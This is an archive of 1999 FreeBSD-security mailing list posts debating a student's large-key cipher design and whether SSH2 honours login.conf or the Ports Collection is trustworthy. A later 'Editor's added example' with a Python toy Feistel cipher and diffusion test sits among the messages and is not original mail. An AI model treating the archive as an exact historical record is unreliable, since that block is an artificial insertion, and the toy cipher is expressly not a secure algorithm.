Using 1024 bytes of key is trivially easy if you are doing (large block)
block cipher. Say you have 1024 byte key and operate on 4096 byte blocks.
Subdivide the key into 64 16 byte subkeys and the key into 64 byte
subblocks. Now encode subblock n with subkey n using a conventional
cipher. The resulting encoding is stronger than the one used on the
subblocks. Then again, definitely not enough to pay for the extreme
size...

But I think he mixed up bytes and bits, and 1024-bit keys aren't all that
bad.

> 2. Building a system to use more resources than current systems, and
> expecting resource consumption to make it interesting is silly.
>

I really don't think that he meant that.

> If you want an interesting project, may I suggest trying to
> cryptanalyze one of the AES candidates? It's more interesting, will
> teach you a bunch, and may produce something useful.
>
> Sorry to flame, but this really isn't a good use of your time.
>

I guess he *HAS* to come up with something himself and then code it for
his CS final project. And crypto may very well also be set as the subset
from which he has to come up with something.

> Adam
>
>
> --
> "It is seldom that liberty of any kind is lost all at once."
> -Hume

Sander

There is no love, no good, no happiness and no future -
all these are just illusions.

From owner-freebsd-security Thu Jun 3 7:18:28 1999
Delivered-To: freebsd-security@freebsd.org
Received: from trump.amber.org (trump.amber.org [209.31.146.82]) by hub.freebsd.org (Postfix) with ESMTP id 1448315345 for ; Thu, 3 Jun 1999 07:18:26 -0700 (PDT) (envelope-from petrilli@amber.org)
Received: by trump.amber.org (Postfix, from userid 1000) id B63841860D; Thu, 3 Jun 1999 10:18:22 -0400 (EDT)
Message-ID: <19990603101822.B21535@amber.org>
Date: Thu, 3 Jun 1999 10:18:22 -0400
From: Christopher Petrilli
To: "Jeroen C. van Gelderen" , Laurence Berland
Cc: security@FreeBSD.ORG
Subject: Re: Not freebsd related...yet
References: <3755D0E4.55677E6@confusion.net> <375640B1.B901E581@vangelderen.org>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Mailer: Mutt 0.93.2i
In-Reply-To: <375640B1.B901E581@vangelderen.org>; from Jeroen C. van Gelderen on Thu, Jun 03, 1999 at 10:45:37AM +0200
X-Disclaimer: I hardly speak for myself, muchless anyone else.
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

As has always been expressed to me:

"Never trust anyone to design a cipher who hasn't spent their life
breaking them."

What that means is that until you understand what can go WRONG in design
(FEAL is a good example of great theory, lousy crypto), there's no way
you can even begin to sketch out ideas for a viable crypto algorithm.
And if you're not going to write a viable one, why bother?

Something more interesting in the crypto world would be dealing with one
of the protocols for applying crypto, such as coin flipping, the
proverbial poker game, or anonymous cash... Zero Knowledge Proofs might
also be interesting... for example, a login system based on ZKP.

Chris
--
| Christopher Petrilli        ``Television is bubble-gum for
| petrilli@amber.org           the mind.'' -Frank Lloyd Wright

From owner-freebsd-security Thu Jun 3 7:26:29 1999
Delivered-To: freebsd-security@freebsd.org
Received: from weathership.homeport.org (breakwater.homeport.org [216.67.13.2]) by hub.freebsd.org (Postfix) with ESMTP id F1A6E15345 for ; Thu, 3 Jun 1999 07:26:18 -0700 (PDT) (envelope-from adam@weathership.homeport.org)
Received: (from adam@localhost) by weathership.homeport.org (8.8.8/8.8.5) id KAA25703; Thu, 3 Jun 1999 10:45:39 -0400 (EDT)
Date: Thu, 3 Jun 1999 10:45:39 -0400
From: Adam Shostack
To: Narvi
Cc: Laurence Berland , security@FreeBSD.ORG
Subject: Re: Not freebsd related...yet
Message-ID: <19990603104539.A25645@weathership.homeport.org>
References: <19990603085644.A24954@weathership.homeport.org>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Mailer: Mutt 0.95.3i
In-Reply-To: ; from Narvi on Thu, Jun 03, 1999 at 05:14:35PM +0300
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Thu, Jun 03, 1999 at 05:14:35PM +0300, Narvi wrote:
| On Thu, 3 Jun 1999, Adam Shostack wrote:
| > Actually, this will be 1. broken, and 2. uninteresting. I'd be happy
| > to bet money if it wasn't a sucker bet.
| >
| > 1. Building a cipher with a large key is hard. See the first Twofish
| > paper, where Schneier et al. discuss the difficulty of building a key
| > schedule to effectively use long keys. Getting 1024 BYTES of
| > randomness is next to impossible, so your implementors will end up
| > expanding a smaller pool of randomness into a large key. Given that
| > this is unavoidable, you should anticipate it in your design, and have
| > a key expansion phase. That you didn't know this is worrisome.
| >
|
| Let's leave aside what he knows and what he doesn't.
|
| Using 1024 bytes of key is trivially easy if you are doing (large block)
| block cipher. Say you have 1024 byte key and operate on 4096 byte blocks.
| Subdivide the key into 64 16 byte subkeys and the key into 64 byte
| subblocks. Now encode subblock n with subkey n using a conventional
| cipher. The resulting encoding is stronger than the one used on the
| subblocks. Then again, definitely not enough to pay for the extreme
| size...

And the avalanche property? Your proposal is going to require a lot
of rounds before each key bit has a chance to affect each bit of
plaintext.

| But I think he mixed up bytes and bits, and 1024-bit keys aren't all that
| bad.

Yes, they are. Address my points about randomness and expansion, or
don't.

Few of the AES candidates have keys that can go longer than 256 bits.
This is because the smart cryptographers who did the design were not
comfortable with keys that long.

| > 2. Building a system to use more resources than current systems, and
| > expecting resource consumption to make it interesting is silly.
|
| I really don't think that he meant that.

The only point he made was that he wanted to use really big keys. I
suggest that this is not only not a useful goal, but it is likely to
detract from the security of the system.

| > If you want an interesting project, may I suggest trying to
| > cryptanalyze one of the AES candidates? It's more interesting, will
| > teach you a bunch, and may produce something useful.
| >
| > Sorry to flame, but this really isn't a good use of your time.

| I guess he *HAS* to come up with something himself and then code it for his
| CS final project. And crypto may very well also be set as the subset from
| which he has to come up with something.

If he needs to write code, there are a large number of useful projects
that could be worked on: integrating crypto into a file system;
integrating ssh-agent into an existing crypto file system; adding
crypto to a protocol like icq or irc. I'd be fairly shocked to
discover a professor who is assigning the creation of new systems as a
senior project.

Adam

From owner-freebsd-security Thu Jun 3 7:30:49 1999
Delivered-To: freebsd-security@freebsd.org
Received: from zip.com.au (zipper.zip.com.au [203.12.97.1]) by hub.freebsd.org (Postfix) with ESMTP id CD782152A3 for ; Thu, 3 Jun 1999 07:30:45 -0700 (PDT) (envelope-from ncb@zip.com.au)
Received: from localhost (ncb@localhost) by zip.com.au (8.9.1/8.9.1) with ESMTP id AAA09543; Fri, 4 Jun 1999 00:30:35 +1000
Date: Fri, 4 Jun 1999 00:30:34 +1000 (EST)
From: Nicholas Brawn
To: Laurence Berland
Cc: security@FreeBSD.ORG
Subject: Re: Not freebsd related...yet
In-Reply-To: <3755D0E4.55677E6@confusion.net>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Wed, 2 Jun 1999, Laurence Berland wrote:

> I'm writing a new encryption algorithm for my computer science final
> project. Although it doesn't need to be particularly great I'm thinking
> there's no reason it's gotta be bad. I'm building a symmetric algorithm
> that is designed to specifically handle large keys ie >1024 bytes. If
> anyone has any hints or suggestions, I'm open to them...in fact that's
> why I'm writing this in the first place. If it works well, maybe
> someday people will actually use it, then again maybe not. thanks for
> your time.

I'm not sure how much reading you've done in the area, but unless there
have been some massive developments in the field, a 1024 *symmetric* key
is ridiculous. At the very most, a 128 bit key should suffice, but it
doesn't hurt to make the key length variable.

I recommend you obtain Bruce Schneier's excellent book, Applied
Cryptography, and read about some of the design criteria for the top
symmetric algorithms in use today. It will give you a good idea of how
you should be approaching development of a new cipher.

-Nick

From owner-freebsd-security Thu Jun 3 9:19:29 1999
Delivered-To: freebsd-security@freebsd.org
Received: from haldjas.folklore.ee (Haldjas.folklore.ee [193.40.6.121]) by hub.freebsd.org (Postfix) with ESMTP id 650CB15415 for ; Thu, 3 Jun 1999 09:19:26 -0700 (PDT) (envelope-from narvi@haldjas.folklore.ee)
Received: from haldjas.folklore.ee (haldjas.folklore.ee [172.17.2.1] (may be forged)) by haldjas.folklore.ee (8.8.8/8.8.4) with SMTP id TAA22165; Thu, 3 Jun 1999 19:19:14 +0300 (EEST)
Date: Thu, 3 Jun 1999 19:19:14 +0300 (EEST)
From: Narvi
To: Christopher Petrilli
Cc: "Jeroen C. van Gelderen" , Laurence Berland , security@FreeBSD.ORG
Subject: Re: Not freebsd related...yet
In-Reply-To: <19990603101822.B21535@amber.org>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Thu, 3 Jun 1999, Christopher Petrilli wrote:

[snip]

>
> Something more interesting in the crypto world would be dealing with one
> of the protocols for applying crypto, such as coin flipping, the
> proverbial poker game, or anonymous cash... Zero Knowledge Proofs might
> also be interesting... for example, a login system based on ZKP.
>

ZKP combined with VPNs is probably the future in networking...

> Chris
> --
> | Christopher Petrilli        ``Television is bubble-gum for
> | petrilli@amber.org           the mind.'' -Frank Lloyd Wright
>

Sander

There is no love, no good, no happiness and no future -
all these are just illusions.

From owner-freebsd-security Thu Jun 3 9:45:47 1999
Delivered-To: freebsd-security@freebsd.org
Received: from critter.freebsd.dk (wandering-wizard.cybercity.dk [212.242.41.238]) by hub.freebsd.org (Postfix) with ESMTP id 31BF414E09 for ; Thu, 3 Jun 1999 09:45:39 -0700 (PDT) (envelope-from phk@critter.freebsd.dk)
Received: from critter.freebsd.dk (localhost [127.0.0.1]) by critter.freebsd.dk (8.9.3/8.9.2) with ESMTP id SAA03614; Thu, 3 Jun 1999 18:44:55 +0200 (CEST) (envelope-from phk@critter.freebsd.dk)
To: Christopher Petrilli
Cc: "Jeroen C. van Gelderen" , Laurence Berland , security@FreeBSD.ORG
Subject: Re: Not freebsd related...yet
In-reply-to: Your message of "Thu, 03 Jun 1999 10:18:22 EDT." <19990603101822.B21535@amber.org>
Date: Thu, 03 Jun 1999 18:44:55 +0200
Message-ID: <3612.928428295@critter.freebsd.dk>
From: Poul-Henning Kamp
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Can we please move this thread to somewhere else than a freebsd mailing
list, THANK YOU!

Poul-Henning

In message <19990603101822.B21535@amber.org>, Christopher Petrilli writes:
>As has always been expressed to me:
>
>"Never trust anyone to design a cipher who hasn't spent their life
>breaking them."
>
>What that means is that until you understand what can go WRONG in design
>(FEAL is a good example of great theory, lousy crypto), there's no way
>you can even begin to sketch out ideas for a viable crypto algorithm.
>And if you're not going to write a viable one, why bother?
>
>Something more interesting in the crypto world would be dealing with one
>of the protocols for applying crypto, such as coin flipping, the
>proverbial poker game, or anonymous cash... Zero Knowledge Proofs might
>also be interesting... for example, a login system based on ZKP.
>
>Chris
>--
>| Christopher Petrilli        ``Television is bubble-gum for
>| petrilli@amber.org           the mind.'' -Frank Lloyd Wright
>
>
>To Unsubscribe: send mail to majordomo@FreeBSD.org
>with "unsubscribe freebsd-security" in the body of the message
>

--
Poul-Henning Kamp             FreeBSD coreteam member
phk@FreeBSD.ORG               "Real hackers run -current on their laptop."
FreeBSD -- It will take a long time before progress goes too far!
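[Editor's added example, appended to the crypto sub-thread above; it is not code from any of the posters. It models the per-subblock construction Narvi describes (read here as: the 1024-byte key split into 64 sixteen-byte subkeys, the 4096-byte block split into 64 sixty-four-byte subblocks, subblock n encrypted under subkey n) and then measures the avalanche property Adam Shostack asks about: how much of the ciphertext moves when one key bit or one plaintext bit is flipped. It also includes the key expansion phase Adam argues for, stretching a short seed into the 1024-byte key. The "conventional cipher" is a toy stand-in of my own (a 4-round Feistel network over 64-byte blocks with SHA-256 as round function) so that the block runs with the Python standard library alone; it is not any real cipher, and the sample key and plaintext are constructed, not random.]

```python
# Added example (Python, standard library only), not code from the thread.
# Models Narvi's large-block construction as read here (1024-byte key ->
# 64 subkeys of 16 bytes; 4096-byte block -> 64 subblocks of 64 bytes;
# subblock n encrypted under subkey n) and measures the diffusion Adam
# Shostack asks about.  The "conventional cipher" is a TOY stand-in: a
# 4-round Feistel network over 64-byte blocks with SHA-256 as round function.
import hashlib
import hmac

SUBKEY_LEN = 16
SUBBLOCK_LEN = 64
N_SUB = 64
KEY_LEN = SUBKEY_LEN * N_SUB      # 1024 bytes, as in the thread
BLOCK_LEN = SUBBLOCK_LEN * N_SUB  # 4096 bytes, as in the thread
ROUNDS = 4


def _xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def _round_fn(subkey: bytes, rnd: int, half: bytes) -> bytes:
    # Keyed PRF for one round; its 32-byte output matches the half-block size.
    return hashlib.sha256(subkey + bytes([rnd]) + half).digest()


def feistel_encrypt(subkey: bytes, block: bytes) -> bytes:
    """Toy 64-byte block cipher used only as the per-subblock primitive."""
    assert len(subkey) == SUBKEY_LEN and len(block) == SUBBLOCK_LEN
    left, right = block[:32], block[32:]
    for rnd in range(ROUNDS):
        left, right = right, _xor(left, _round_fn(subkey, rnd, right))
    return left + right


def feistel_decrypt(subkey: bytes, block: bytes) -> bytes:
    left, right = block[:32], block[32:]
    for rnd in reversed(range(ROUNDS)):
        left, right = _xor(right, _round_fn(subkey, rnd, left)), left
    return left + right


def _chunks(data: bytes, size: int):
    return [data[i:i + size] for i in range(0, len(data), size)]


def big_block_encrypt(key: bytes, block: bytes) -> bytes:
    """Narvi's construction: subblock n under subkey n, independently."""
    assert len(key) == KEY_LEN and len(block) == BLOCK_LEN
    subkeys, subblocks = _chunks(key, SUBKEY_LEN), _chunks(block, SUBBLOCK_LEN)
    return b"".join(feistel_encrypt(k, b) for k, b in zip(subkeys, subblocks))


def big_block_decrypt(key: bytes, block: bytes) -> bytes:
    subkeys, subblocks = _chunks(key, SUBKEY_LEN), _chunks(block, SUBBLOCK_LEN)
    return b"".join(feistel_decrypt(k, b) for k, b in zip(subkeys, subblocks))


def flip_bit(data: bytes, bit_index: int) -> bytes:
    out = bytearray(data)
    out[bit_index // 8] ^= 1 << (bit_index % 8)
    return bytes(out)


def changed_subblocks(c1: bytes, c2: bytes) -> list:
    """Indices of the 64-byte subblocks in which two ciphertexts differ."""
    pairs = zip(_chunks(c1, SUBBLOCK_LEN), _chunks(c2, SUBBLOCK_LEN))
    return [n for n, (a, b) in enumerate(pairs) if a != b]


def diffusion_report(key: bytes, plaintext: bytes) -> dict:
    """Flip one key bit and, separately, one plaintext bit; see what moves."""
    base = big_block_encrypt(key, plaintext)
    key_flip = big_block_encrypt(flip_bit(key, 3000), plaintext)   # bit 3000 lies in subkey 23
    pt_flip = big_block_encrypt(key, flip_bit(plaintext, 20000))   # bit 20000 lies in subblock 39
    return {
        "key_bit_subblocks": changed_subblocks(base, key_flip),
        "key_bit_bytes": sum(a != b for a, b in zip(base, key_flip)),
        "pt_bit_subblocks": changed_subblocks(base, pt_flip),
        "pt_bit_bytes": sum(a != b for a, b in zip(base, pt_flip)),
    }


def expand_key(seed: bytes) -> bytes:
    """Key expansion phase (Adam's point): stretch a short seed to 1024 bytes
    with HMAC-SHA256 in counter mode.  The output never holds more entropy
    than the seed did, however long it is."""
    out = b""
    for counter in range((KEY_LEN + 31) // 32):
        out += hmac.new(seed, counter.to_bytes(4, "big"), hashlib.sha256).digest()
    return out[:KEY_LEN]


# Constructed, deterministic sample inputs (demo only; a real key is random).
SAMPLE_KEY = bytes(range(256)) * 4                            # 1024 bytes
SAMPLE_PT = bytes((i * 7) & 0xFF for i in range(BLOCK_LEN))   # 4096 bytes

if __name__ == "__main__":
    report = diffusion_report(SAMPLE_KEY, SAMPLE_PT)
    print(report)  # each flip touches exactly one subblock: at most 64 of 4096 bytes
    assert big_block_decrypt(SAMPLE_KEY, big_block_encrypt(SAMPLE_KEY, SAMPLE_PT)) == SAMPLE_PT
```

Running it shows the structural limit of the construction: a single flipped key bit changes only the one 64-byte subblock whose subkey it lives in, and a single flipped plaintext bit likewise, so each key bit influences at most 1/64 of the output no matter how good the inner cipher is. A cipher with full diffusion would change about half of all 4096 bytes in both cases. The expansion routine makes Adam's other point concrete: a 1024-byte key derived from a 32-byte seed is still only a 256-bit key.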
From owner-freebsd-security Thu Jun 3 10: 5: 0 1999
Delivered-To: freebsd-security@freebsd.org
Received: from guepardo.vicosa.com.br (guepardo.tdnet.com.br [200.236.148.6]) by hub.freebsd.org (Postfix) with ESMTP id 2D97415210 for ; Thu, 3 Jun 1999 10:04:47 -0700 (PDT) (envelope-from kernel@tdnet.com.br)
Received: from tdnet.com.br [200.236.148.203] by guepardo.vicosa.com.br with ESMTP (SMTPD32-5.00) id A87430E0096; Thu, 03 Jun 1999 14:16:36 -0300
Message-ID: <37568B58.C48DCEA2@tdnet.com.br>
Date: Thu, 03 Jun 1999 14:04:08 +0000
From: Unknow User
X-Mailer: Mozilla 4.05 [en] (X11; I; FreeBSD 2.2.8-STABLE i386)
MIME-Version: 1.0
To: freebsd-security@freebsd.org
Subject: SSH2 (in FreeBSD-Questions)
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

The following was running at Questions:

login.conf is all fine and dandy, but... SSH2 doesn't support using
login, SSH1 did, I don't know why they removed it, I rather liked it.
So people logging in with SSH2 wouldn't be affected by anything in
login.conf... Unless there's some hidden feature in SSH2 that lets it
use login, I'm screwed, or I only run SSH1, unfortunately, most windows
ssh clients default to SSH2 protocol from what I've seen. I don't expect
them to enjoy that.. =P

-**-

What is this? Isn't the OS supposed to be robust enough to handle that!
How is it possible to write software that can bypass system limits
imposed by the sysadmin? How is it implemented? So this implementation
is insecure, since it ALLOWS user level programs to run over it!

Can anybody explain it to me?

Thanks a lot!

--
"The box said 'Requires Windows 98, NT, Linux or better' so I installed
FreeBSD."

From owner-freebsd-security Thu Jun 3 10:24:50 1999
Delivered-To: freebsd-security@freebsd.org
Received: from wopr.caltech.edu (wopr.caltech.edu [131.215.240.222]) by hub.freebsd.org (Postfix) with ESMTP id 6B8E615058 for ; Thu, 3 Jun 1999 10:24:48 -0700 (PDT) (envelope-from mph@wopr.caltech.edu)
Received: (from mph@localhost) by wopr.caltech.edu (8.9.3/8.9.1) id KAA59233; Thu, 3 Jun 1999 10:24:27 -0700 (PDT) (envelope-from mph)
Date: Thu, 3 Jun 1999 10:24:27 -0700
From: Matthew Hunt
To: Unknow User
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: SSH2 (in FreeBSD-Questions)
Message-ID: <19990603102427.D58665@wopr.caltech.edu>
References: <37568B58.C48DCEA2@tdnet.com.br>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Mailer: Mutt 0.95.4i
In-Reply-To: <37568B58.C48DCEA2@tdnet.com.br>; from Unknow User on Thu, Jun 03, 1999 at 02:04:08PM +0000
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Thu, Jun 03, 1999 at 02:04:08PM +0000, Unknow User wrote:

> login.conf is all fine and dandy, but... SSH2 doesn't support using
> login, SSH1 did, I don't know why they removed it, I rather liked it.

Did you install ssh2 from the Ports Collection? I haven't tried it,
but it looks like patch-ah provides login.conf functionality.

--
Matthew Hunt                  * UNIX is a lever for the
http://www.pobox.com/~mph/    * intellect. -J.R. Mashey

From owner-freebsd-security Thu Jun 3 10:29: 7 1999
Delivered-To: freebsd-security@freebsd.org
Received: from guepardo.vicosa.com.br (guepardo.tdnet.com.br [200.236.148.6]) by hub.freebsd.org (Postfix) with ESMTP id 9ED7C1550C for ; Thu, 3 Jun 1999 10:28:50 -0700 (PDT) (envelope-from kernel@tdnet.com.br)
Received: from tdnet.com.br [200.236.148.203] by guepardo.vicosa.com.br with ESMTP (SMTPD32-5.00) id ADFF396008C; Thu, 03 Jun 1999 14:40:15 -0300
Message-ID: <375690E3.4BC9BB94@tdnet.com.br>
Date: Thu, 03 Jun 1999 14:27:47 +0000
From: Unknow User
X-Mailer: Mozilla 4.05 [en] (X11; I; FreeBSD 2.2.8-STABLE i386)
MIME-Version: 1.0
To: Matthew Hunt
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: SSH2 (in FreeBSD-Questions)
References: <37568B58.C48DCEA2@tdnet.com.br> <19990603102427.D58665@wopr.caltech.edu>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

No, I never use ports (Due to security problem)!
I always get the source!

Any tips?

Thanks.

--
"The box said 'Requires Windows 98, NT, Linux or better' so I installed
FreeBSD."

From owner-freebsd-security Thu Jun 3 10:34:37 1999
Delivered-To: freebsd-security@freebsd.org
Received: from wrath.cs.utah.edu (wrath.cs.utah.edu [155.99.198.100]) by hub.freebsd.org (Postfix) with ESMTP id 625B51550C for ; Thu, 3 Jun 1999 10:34:36 -0700 (PDT) (envelope-from danderse@cs.utah.edu)
Received: from torrey.cs.utah.edu (torrey.cs.utah.edu [155.99.212.91]) by wrath.cs.utah.edu (8.8.8/8.8.8) with ESMTP id LAA27177; Thu, 3 Jun 1999 11:34:34 -0600 (MDT)
Received: (from danderse@localhost) by torrey.cs.utah.edu (8.9.3/8.9.1) id LAA61854; Thu, 3 Jun 1999 11:34:33 -0600 (MDT) (envelope-from danderse@cs.utah.edu)
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Date: Thu, 3 Jun 1999 11:34:33 -0600 (MDT)
From: "David G. Andersen"
To: Unknow User
Cc: Matthew Hunt , freebsd-security@FreeBSD.ORG
Subject: Re: SSH2 (in FreeBSD-Questions)
In-Reply-To: Unknow User's message of Thu, June 3 1999 <375690E3.4BC9BB94@tdnet.com.br>
References: <37568B58.C48DCEA2@tdnet.com.br> <19990603102427.D58665@wopr.caltech.edu> <375690E3.4BC9BB94@tdnet.com.br>
X-Mailer: VM 6.43 under 20.4 "Emerald" XEmacs Lucid
Message-ID: <14166.48244.203647.561921@torrey.cs.utah.edu>
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Lo and Behold, Unknow User said:
> No, I never use ports (Due to security problem)!
> I always get the source!
>
> Any tips?

Use ports. That's what they're there for, that's why they have MD5
signatures.

Alternate: Look over the patch, apply it yourself. This is called
"Acting on behalf of the ports system", and is also known as a waste of
time, but it should work.

-Dave

From owner-freebsd-security Thu Jun 3 10:35:54 1999
Delivered-To: freebsd-security@freebsd.org
Received: from jade.chc-chimes.com (jade.chc-chimes.com [206.67.97.83]) by hub.freebsd.org (Postfix) with ESMTP id 293AA15966 for ; Thu, 3 Jun 1999 10:35:48 -0700 (PDT) (envelope-from billf@jade.chc-chimes.com)
Received: from localhost (billf@localhost) by jade.chc-chimes.com (8.8.8/8.8.8) with SMTP id NAA26944; Thu, 3 Jun 1999 13:38:26 -0400 (EDT) (envelope-from billf@jade.chc-chimes.com)
Date: Thu, 3 Jun 1999 13:38:26 -0400 (EDT)
From: Bill Fumerola
To: Unknow User
Cc: Matthew Hunt , freebsd-security@FreeBSD.ORG
Subject: Re: SSH2 (in FreeBSD-Questions)
In-Reply-To: <375690E3.4BC9BB94@tdnet.com.br>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Thu, 3 Jun 1999, Unknow User wrote:

> No, I never use ports (Due to security problem)!
> I always get the source!
>
> Any tips?

Manually apply the patch or use the source and figure it out for yourself.

Stop doing things the hard way just for a false sense of security.

- bill fumerola - billf@chc-chimes.com - BF1560 - computer horizons corp -
- ph:(800) 252-2421 - bfumerol@computerhorizons.com - billf@FreeBSD.org -

From owner-freebsd-security Thu Jun 3 10:37: 0 1999
Delivered-To: freebsd-security@freebsd.org
Received: from ns1.yes.no (ns1.yes.no [195.204.136.10]) by hub.freebsd.org (Postfix) with ESMTP id D05681552F for ; Thu, 3 Jun 1999 10:36:56 -0700 (PDT) (envelope-from eivind@bitbox.follo.net)
Received: from bitbox.follo.net (bitbox.follo.net [195.204.143.218]) by ns1.yes.no (8.9.1a/8.9.1) with ESMTP id TAA15493; Thu, 3 Jun 1999 19:36:10 +0200 (CEST)
Received: (from eivind@localhost) by bitbox.follo.net (8.8.8/8.8.6) id TAA78135; Thu, 3 Jun 1999 19:36:09 +0200 (MET DST)
Date: Thu, 3 Jun 1999 19:36:09 +0200
From: Eivind Eklund
To: Unknow User
Cc: Matthew Hunt , freebsd-security@FreeBSD.ORG
Subject: Re: SSH2 (in FreeBSD-Questions)
Message-ID: <19990603193609.H77195@bitbox.follo.net>
References: <37568B58.C48DCEA2@tdnet.com.br> <19990603102427.D58665@wopr.caltech.edu> <375690E3.4BC9BB94@tdnet.com.br>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Mailer: Mutt 0.95.1i
In-Reply-To: <375690E3.4BC9BB94@tdnet.com.br>; from Unknow User on Thu, Jun 03, 1999 at 02:27:47PM +0000
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Thu, Jun 03, 1999 at 02:27:47PM +0000, Unknow User wrote:
> No, I never use ports (Due to security problem)!
> I always get the source!
>
> Any tips?

Ports are *better* than getting the source manually, as they (often)
include extra security patches, while still allowing you to access the
source before compiling it. They also provide (some) protection against
trojan horses.

Now, go install the port, and think a tiny bit more before deciding
your security policy the next time, OK?

Eivind.

From owner-freebsd-security Thu Jun 3 10:37:47 1999
Delivered-To: freebsd-security@freebsd.org
Received: from wopr.caltech.edu (wopr.caltech.edu [131.215.240.222]) by hub.freebsd.org (Postfix) with ESMTP id F27C2159AA for ; Thu, 3 Jun 1999 10:37:44 -0700 (PDT) (envelope-from mph@wopr.caltech.edu)
Received: (from mph@localhost) by wopr.caltech.edu (8.9.3/8.9.1) id KAA59582; Thu, 3 Jun 1999 10:37:32 -0700 (PDT) (envelope-from mph)
Date: Thu, 3 Jun 1999 10:37:31 -0700
From: Matthew Hunt
To: Unknow User
Cc: freebsd-security@freebsd.org
Subject: Re: SSH2 (in FreeBSD-Questions)
Message-ID: <19990603103731.G58665@wopr.caltech.edu>
References: <37568B58.C48DCEA2@tdnet.com.br> <19990603102427.D58665@wopr.caltech.edu> <375690E3.4BC9BB94@tdnet.com.br>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Mailer: Mutt 0.95.4i
In-Reply-To: <375690E3.4BC9BB94@tdnet.com.br>; from Unknow User on Thu, Jun 03, 1999 at 02:27:47PM +0000
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Thu, Jun 03, 1999 at 02:27:47PM +0000, Unknow User wrote:

> No, I never use ports (Due to security problem)!
> I always get the source!

The ports get the source, apply patches, and build the source. You
can easily read the patches and see if there's anything you don't
like. As the patches are much smaller than the source, it shouldn't
be a burden.

> Any tips?

Yes. Take advantage of the fact that dozens of people have invested
thousands of hours to make ssh2 and thousands of other applications
work well on FreeBSD. Take advantage of the fact that the exact
problem you're having is one that we have already solved. Use the
Ports Collection, or at least read the patches which address exactly
the problem you're having.

--
Matthew Hunt                  * UNIX is a lever for the
http://www.pobox.com/~mph/    * intellect. -J.R. Mashey

From owner-freebsd-security Thu Jun 3 10:41: 3 1999
Delivered-To: freebsd-security@freebsd.org
Received: from guepardo.vicosa.com.br (guepardo.tdnet.com.br [200.236.148.6]) by hub.freebsd.org (Postfix) with ESMTP id 0DCF7155DC for ; Thu, 3 Jun 1999 10:40:56 -0700 (PDT) (envelope-from kernel@tdnet.com.br)
Received: from tdnet.com.br [200.236.148.203] by guepardo.vicosa.com.br with ESMTP (SMTPD32-5.00) id A0DDDE0076; Thu, 03 Jun 1999 14:52:29 -0300
Message-ID: <375693C1.68C59211@tdnet.com.br>
Date: Thu, 03 Jun 1999 14:40:01 +0000
From: Unknow User
X-Mailer: Mozilla 4.05 [en] (X11; I; FreeBSD 2.2.8-STABLE i386)
MIME-Version: 1.0
To: Bill Fumerola
Cc: Matthew Hunt , freebsd-security@FreeBSD.ORG
Subject: Re: SSH2 (in FreeBSD-Questions)
References:
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Bill Fumerola wrote:

> Manually apply the patch or use the source and figure it out for yourself.
>
> Stop doing things the hard way just for a false sense of security.
                                            ^^^^^^^^^^^^^^^^^^^^^^^

The problem is that we never know what SUID a port will install!

It happens that others have the same "false sense of security" I have:

Look at this: http://www.freebsd.org/~jkb/howto.html

--
"The box said 'Requires Windows 98, NT, Linux or better' so I installed
FreeBSD."

From owner-freebsd-security Thu Jun 3 10:42:37 1999
Delivered-To: freebsd-security@freebsd.org
Received: from euphoria.confusion.net (euphoria.confusion.net [209.63.19.10]) by hub.freebsd.org (Postfix) with ESMTP id 403F315571 for ; Thu, 3 Jun 1999 10:42:35 -0700 (PDT) (envelope-from stuyman@euphoria.confusion.net)
Received: from euphoria.confusion.net (euphoria.confusion.net [209.63.19.10]) by euphoria.confusion.net (8.9.3/8.9.2) with SMTP id KAA22931; Thu, 3 Jun 1999 10:42:23 -0700 (PDT)
Date: Thu, 3 Jun 1999 10:42:23 -0700 (PDT)
From: Larry Berland To: Adam Shostack Cc: security@FreeBSD.ORG Subject: Re: Not freebsd related...yet In-Reply-To: <19990603085644.A24954@weathership.homeport.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

On Thu, 3 Jun 1999, Adam Shostack wrote:

> On Wed, Jun 02, 1999 at 08:48:36PM -0400, Laurence Berland wrote:
> | I'm writing a new encryption algorithm for my computer science final
> | project. Although it doesn't need to be particularly great I'm thinking
